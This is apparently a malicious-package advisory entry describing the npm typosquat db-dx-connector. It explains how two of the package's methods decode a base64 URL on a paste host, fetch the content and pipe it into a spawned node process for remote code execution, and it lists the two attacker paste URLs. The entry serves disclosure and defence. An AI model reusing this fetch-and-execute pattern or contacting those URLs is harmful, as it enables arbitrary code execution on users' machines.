MAL-2026-5463

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b0a6cd3a84c38e801823eba4ccf0d4ff2a28f5955309bfb300f7f0f640b1a69b) db-dx-connector is a name-transposition of the legitimate divblox package dx-db-connector (the package.json even points repository.url at github.com/divbloxjs/dx-db-connector, which it does not own). Beyond mimicking the real connector's API, index.js (~line 242) exposes two methods (`queryDBConnect`, `queryDBErrorReply`) that base64-decode a hardcoded constant to a URL on the anonymous paste host jsonkeeper.com, fetch the paste body with axios, and pipe it to the stdin of a detached `spawn('node', [])` child process. The decoded endpoints are https://www.jsonkeeper.com/b/ZIAIK and https://jsonkeeper.com/b/L435A. Whoever controls those pastes can execute arbitrary Node.js code on any host that calls either method. The base64 obfuscation of the URL constant, the use of a mutable third-party paste host, and the pipe-to-node sink are unambiguous attacker shape — there is no legitimate database-connector reason for any of these primitives. Any consumer who fat-fingered the package name and exercises the connector triggers attacker-controlled RCE.